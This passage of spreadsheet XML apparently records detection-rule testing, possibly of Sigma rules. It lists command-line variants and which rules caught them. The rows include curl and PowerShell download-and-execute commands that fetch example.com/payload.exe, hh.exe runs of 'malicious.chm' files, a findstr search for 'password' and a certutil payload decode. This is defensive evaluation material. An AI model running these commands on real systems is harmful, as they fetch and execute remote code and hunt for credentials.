      <c r="A1775" s="43" t="n"/>
      <c r="B1775" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1775" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1775" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1775" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c curl http://example.com/payload.exe &gt; payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F1775" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1775" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1775" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1775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75" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1775" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1776" ht="15.75" customHeight="1" s="42">
      <c r="A1776" s="43" t="n"/>
      <c r="B1776" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1776" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1776" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1776" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" curl http://example.com/payload.exe &gt; payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F1776" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1776" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1776" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1776" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1776" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1776" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1777" ht="15.75" customHeight="1" s="42">
      <c r="A1777" s="43" t="n"/>
      <c r="B1777" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1777" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1777" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1777" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C curl http://example.com/payload.exe &gt; payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F1777" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1777" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1777" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1777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77" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1777" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1778" ht="15.75" customHeight="1" s="42">
      <c r="A1778" s="43" t="n"/>
      <c r="B1778" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1778" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1778" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1778" s="43" t="inlineStr">
        <is>
          <t>cmd.exe -"c" curl http://example.com/payload.exe &gt; payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F1778" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1778" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1778" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1778" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1778" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1778" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1779" ht="15.75" customHeight="1" s="42">
      <c r="A1779" s="43" t="n"/>
      <c r="B1779" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1779" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1779" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1779" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F1779" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1779" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1779" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1779" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1779" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1779" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1780" ht="15.75" customHeight="1" s="42">
      <c r="A1780" s="43" t="n"/>
      <c r="B1780" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1780" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1780" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1780" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F1780" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1780" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1780" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1780" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1780" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1780" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1781" ht="15.75" customHeight="1" s="42">
      <c r="A1781" s="43" t="n"/>
      <c r="B1781" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1781" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1781" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1781" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -C "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F1781" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1781" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1781" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1781" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1781" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1781" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1782" ht="15.75" customHeight="1" s="42">
      <c r="A1782" s="43" t="n"/>
      <c r="B1782" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdl32_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C1782" s="36" t="inlineStr">
        <is>
          <t>Potential Arbitrary File Download Via Cmdl32.EXE</t>
        </is>
      </c>
      <c r="D1782" s="36" t="inlineStr">
        <is>
          <t>f37aba28-a9e6-4045-882c-d5004043b337</t>
        </is>
      </c>
      <c r="E1782" s="43" t="inlineStr">
        <is>
          <t>cmdl32.exe -vpn -lan C:\path\to\config.txt</t>
        </is>
      </c>
      <c r="F1782" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1782" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1782" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1782" s="43" t="n"/>
      <c r="J1782" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1782" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1783" ht="15.75" customHeight="1" s="42">
      <c r="A1783" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1783" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_expand_cabinet_files</t>
        </is>
      </c>
      <c r="C1783" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion</t>
        </is>
      </c>
      <c r="D1783" s="36" t="inlineStr">
        <is>
          <t>9f107a84-532c-41af-b005-8d12a607639f</t>
        </is>
      </c>
      <c r="E1783" s="36" t="inlineStr">
        <is>
          <t>expand "C:\Users	haim\AppData\Local\Temp\art-expand-test.cab" /F:* .</t>
        </is>
      </c>
      <c r="F1783" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1783" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1783" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1783" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion (9f107a84-532c-41af-b005-8d12a607639f)</t>
        </is>
      </c>
      <c r="J1783" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1783" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1784" ht="15.75" customHeight="1" s="42">
      <c r="A1784" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1784" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_expand_cabinet_files</t>
        </is>
      </c>
      <c r="C1784" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion</t>
        </is>
      </c>
      <c r="D1784" s="36" t="inlineStr">
        <is>
          <t>9f107a84-532c-41af-b005-8d12a607639f</t>
        </is>
      </c>
      <c r="E1784" s="36" t="inlineStr">
        <is>
          <t>expand "C:\Users	haim\AppData\Local\Temp\art-expand-test.cab" -F:* .</t>
        </is>
      </c>
      <c r="F1784" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1784" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1784" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1784" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion (9f107a84-532c-41af-b005-8d12a607639f)</t>
        </is>
      </c>
      <c r="J1784" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1784" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1785" ht="15.75" customHeight="1" s="42">
      <c r="A1785" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1785" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_expand_cabinet_files</t>
        </is>
      </c>
      <c r="C1785" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion</t>
        </is>
      </c>
      <c r="D1785" s="36" t="inlineStr">
        <is>
          <t>9f107a84-532c-41af-b005-8d12a607639f</t>
        </is>
      </c>
      <c r="E1785" s="36" t="inlineStr">
        <is>
          <t>expand "C:\Users	haim\AppData\Local\Temp\art-expand-test.cab" -F "*" .</t>
        </is>
      </c>
      <c r="F1785" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1785" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1785" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1785" s="43" t="n"/>
      <c r="J1785" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1785" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1786" ht="15.75" customHeight="1" s="42">
      <c r="A1786" s="43" t="n"/>
      <c r="B1786" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C1786" s="36" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1786" s="36" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E1786" s="36" t="inlineStr">
        <is>
          <t>findstr.exe -si "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F1786" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1786" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1786" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1786" s="43" t="n"/>
      <c r="J1786" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1786" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1787" ht="15.75" customHeight="1" s="42">
      <c r="A1787" s="43" t="n"/>
      <c r="B1787" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1787" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1787" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1787" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F1787" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1787" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1787" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1787" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1787" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1787" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1788" ht="15.75" customHeight="1" s="42">
      <c r="A1788" s="43" t="n"/>
      <c r="B1788" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1788" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1788" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1788" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F1788" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1788" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1788" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1788" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1788" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1788" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1789" ht="15.75" customHeight="1" s="42">
      <c r="A1789" s="43" t="n"/>
      <c r="B1789" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1789" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1789" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1789" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F1789" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1789" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1789" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1789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789" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1789" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1790" ht="15.75" customHeight="1" s="42">
      <c r="A1790" s="43" t="n"/>
      <c r="B1790" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1790" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1790" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1790" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F1790" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1790" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1790" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1790" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1790" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1790" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1791" ht="15.75" customHeight="1" s="42">
      <c r="A1791" s="43" t="n"/>
      <c r="B1791" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1791" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1791" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1791" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F1791" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1791" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1791" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1791" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1791" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1791" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1792" ht="15.75" customHeight="1" s="42">
      <c r="A1792" s="43" t="n"/>
      <c r="B1792" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1792" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1792" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1792" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1792" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1792" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1792" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1792" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1792" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1792" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1793" ht="15.75" customHeight="1" s="42">
      <c r="A1793" s="43" t="n"/>
      <c r="B1793" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1793" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1793" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1793" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1793" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1793" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1793" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1793" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1793" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1793" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1794" ht="15.75" customHeight="1" s="42">
      <c r="A1794" s="43" t="n"/>
      <c r="B1794" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1794" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1794" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1794" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1794" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1794" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1794" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1794" s="43" t="n"/>
      <c r="J1794" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1794" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1795" ht="15.75" customHeight="1" s="42">
      <c r="A1795" s="43" t="n"/>
      <c r="B1795" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1795" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1795" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1795" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1795" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1795" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1795" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1795" s="36" t="n"/>
      <c r="J1795" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1795" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1796" ht="15.75" customHeight="1" s="42">
      <c r="A1796" s="43" t="n"/>
      <c r="B1796" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1796" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1796" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1796" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F1796" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1796" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1796" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1796" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1796" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1796" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1797" ht="15.75" customHeight="1" s="42">
      <c r="A1797" s="43" t="n"/>
      <c r="B1797" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1797" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1797" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1797" s="36" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F1797" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1797" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1797" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1797" s="36" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1797" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1797" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1798" ht="15.75" customHeight="1" s="42">
      <c r="A1798" s="43" t="n"/>
      <c r="B1798" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1798" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1798" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1798" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F1798" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1798" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1798" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1798" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1798" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1798" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1799" ht="15.75" customHeight="1" s="42">
      <c r="A1799" s="43" t="n"/>
      <c r="B1799" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1799" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1799" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1799" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F1799" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1799" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1799" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1799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799" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1799" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1800" ht="15.75" customHeight="1" s="42">
      <c r="A1800" s="43" t="n"/>
      <c r="B1800" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_zipexec</t>
        </is>
      </c>
      <c r="C1800" s="36" t="inlineStr">
        <is>
          <t>Suspicious ZipExec Execution</t>
        </is>
      </c>
      <c r="D1800" s="36" t="inlineStr">
        <is>
          <t>90dcf730-1b71-4ae7-9ffc-6fcf62bd0132</t>
        </is>
      </c>
      <c r="E1800" s="43" t="inlineStr">
        <is>
          <t>copy payload.zip payload.txt &amp;&amp; certutil -decodehex payload.txt payload.exe</t>
        </is>
      </c>
      <c r="F1800" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1800" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1800" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1800" s="43" t="n"/>
      <c r="J1800" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1800" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1801" ht="15.75" customHeight="1" s="42">
      <c r="A1801" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1801" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_infdefaultinstall_execute_sct_scripts</t>
        </is>
      </c>
      <c r="C1801" s="36" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution</t>
        </is>
      </c>
      <c r="D1801" s="36" t="inlineStr">
        <is>
          <t>ce7cf472-6fcc-490a-9481-3786840b5d9b</t>
        </is>
      </c>
      <c r="E1801" s="36" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe  "C:\AtomicRedTeam\atomics\T1218\src\Infdefaultinstall.inf"</t>
        </is>
      </c>
      <c r="F1801" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1801" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1801" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1801" s="36" t="inlineStr">
        <is>
